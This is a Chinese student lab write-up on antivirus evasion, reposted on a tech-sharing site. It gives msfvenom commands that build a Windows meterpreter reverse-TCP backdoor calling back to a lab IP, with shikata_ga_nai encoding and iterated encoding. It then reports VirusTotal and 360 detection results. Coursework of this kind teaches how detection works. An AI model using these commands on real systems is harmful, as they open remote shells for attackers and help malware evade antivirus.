标签：后门 编码 exe 免杀 Exp3 检测 msfvenom 原理

20191218 Exp3-免杀原理

实验过程

一、正确使用msf编码器、msfvenom生成如jar之类的其他文件

免杀检测

1. 参考实验二Exp2-后门原理与实践中的第三个小实验，在Kali上用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218_backdoor.exe生成针对Windows的毒化后门可执行程序20191218_backdoor.exe
   
2. 放入VirusTotal和360安全卫士中进行扫描

• VirusTotal中的扫描结果
  
  69款杀软中53款报出了病毒，不加处理的后门程序能被大部分的杀软检测到

• 360安全卫士杀毒检测结果
  

3. 使用msf编码器多次迭代，生成exe文件

• 编码会降低检出率，理论上讲多编码几次，可降低被检测出的可能性
• 一次编码使用命令：-e选择编码器，-b是payload中需要去除的字符，该命令中为了使'\x00'不出现在shellcode中，因为shellcode以'\x00'为结束符
  在Kali中输入如下命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218exp3.exe

用VirusTotal检测还是能检测出问题

加入多次编码参数-i，继续尝试

放入360查杀还是会检测出病毒

以上步骤说明简单的多次编码无法实现免杀

生成php格式的后门文件

man msfvenom查找msf毒化命令的使用说明

使用如下命令生成php格式的后门文件

标签：后门,编码,exe,免杀,Exp3,检测,msfvenom,原理
来源： https://www.cnblogs.com/20191218tangqiheng/p/16093201.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。